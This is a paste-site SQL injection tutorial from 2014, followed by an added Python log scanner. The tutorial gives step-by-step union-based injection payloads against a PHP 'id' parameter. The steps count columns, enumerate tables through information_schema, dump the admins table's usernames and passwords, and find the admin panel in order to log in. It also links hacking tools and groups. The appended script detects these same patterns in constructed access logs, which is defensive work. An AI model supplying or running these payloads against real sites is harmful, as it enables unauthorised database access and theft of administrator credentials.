acerz

Basic SQL Injection (Manual)

Jul 9th, 2014
Basic SQL Injection Tutorial by "Linux & Hacking Tutorials"

1) Counting columns: increase the number until you get an ERROR
.php?id=1 order by 1-- ->no error
.php?id=1 order by 2-- ->no error
.php?id=1 order by 3-- ->no error
.php?id=1 order by 4-- ->no error
.php?id=1 order by 5-- ->ERROR!
We got an error on 5, so the column count is 4!

2) Finding the vulnerable column: add - before the ID number, replace "order by" with "union all select" and count out the 4 columns: 1,2,3,4
.php?id=-1 union all select 1,2,3,4--
Page shows the vulnerable column: 2

3) Gathering info about the database: replace the 2 in the query with group_concat() and put your own expressions inside the brackets
.php?id=-1 union all select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4--
This gives us the database name, user and version (0x3a is a colon in hex, used as a separator).

4) Gathering tables from the database: put table_name inside the brackets and add "from information_schema.tables where table_schema=database()" to the URL, in front of the trailing --
.php?id=-1 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
Page shows the tables: news,articles,photos,admins

5) Gathering columns from the admins table: in this case the admin login should be in the admins table
Replace every "table" with "column" and add "from information_schema.columns where table_name=0xHEX--" to the URL
The HEX is the hex value of the table name "admins", which is 61646d696e73
HEX converter: http://www.swingnote.com/tools/texttohex.php
.php?id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e73--
Page shows: id,user,password

6) Gathering admins' logins: put user,password in the brackets and add "from (table name here)--" to the URL
.php?id=-1 union all select 1,group_concat(user,0x3a,password),3,4 from admins--
Page shows: admin1:123456
So that means the user is admin1 and the password is 123456

7) Finding the admin panel: you can use tools like this: http://www.scan.subhashdasyam.com/admin-panel-finder.php or do it manually with
/admin
/admin.php
/login
/login.php
/cms
/adm
...
When you find the panel, just log in :)
That's all
Video Tutorial: http://youtu.be/YMoJrJE0qfA
Facebook group on hacking tutorials: https://www.facebook.com/groups/706155462750576/
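Seen from the server side, the sequence above (order by column counting, then union select, then information_schema enumeration) leaves a very recognisable trail in the web server access log. The following Python script is an added example, not part of the original paste: it URL-decodes the query string of Apache-style log lines and flags requests matching each step, then reports source IPs that hit more than one signature. The log lines, hostnames and IPs are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real server): the probing
# sequence from the tutorial on /news.php, plus two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jul/2014:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [09/Jul/2014:10:00:02 +0000] "GET /news.php?id=1%20order%20by%205-- HTTP/1.1" 500 312
10.0.0.5 - - [09/Jul/2014:10:00:03 +0000] "GET /news.php?id=-1%20union%20all%20select%201,2,3,4-- HTTP/1.1" 200 4870
10.0.0.5 - - [09/Jul/2014:10:00:04 +0000] "GET /news.php?id=-1%20union%20all%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 4990
10.0.0.9 - - [09/Jul/2014:10:00:05 +0000] "GET /photos.php?id=42 HTTP/1.1" 200 8801
"""

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One signature per tutorial step; matched against the decoded, lower-cased
# query string so %20 / + encoding does not hide the keywords.
SIGNATURES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("comment_terminator", re.compile(r"--\s*$")),
]

def scan_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    hits = [name for name, rx in SIGNATURES if rx.search(query.lower())]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "path": path, "hits": hits}

def scan_log(text):
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]

def suspicious_ips(findings, min_hits=2):
    """IPs that triggered at least min_hits distinct signatures: a sequence, not a stray request."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["hits"])
    return sorted(ip for ip, sigs in by_ip.items() if len(sigs) >= min_hits)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["hits"])
    print("suspicious:", suspicious_ips(scan_log(SAMPLE_LOG)))
```

Note the 500 on the "order by 5" request: the error the tutorial relies on in step 1 is itself a useful correlation signal next to the matched keywords.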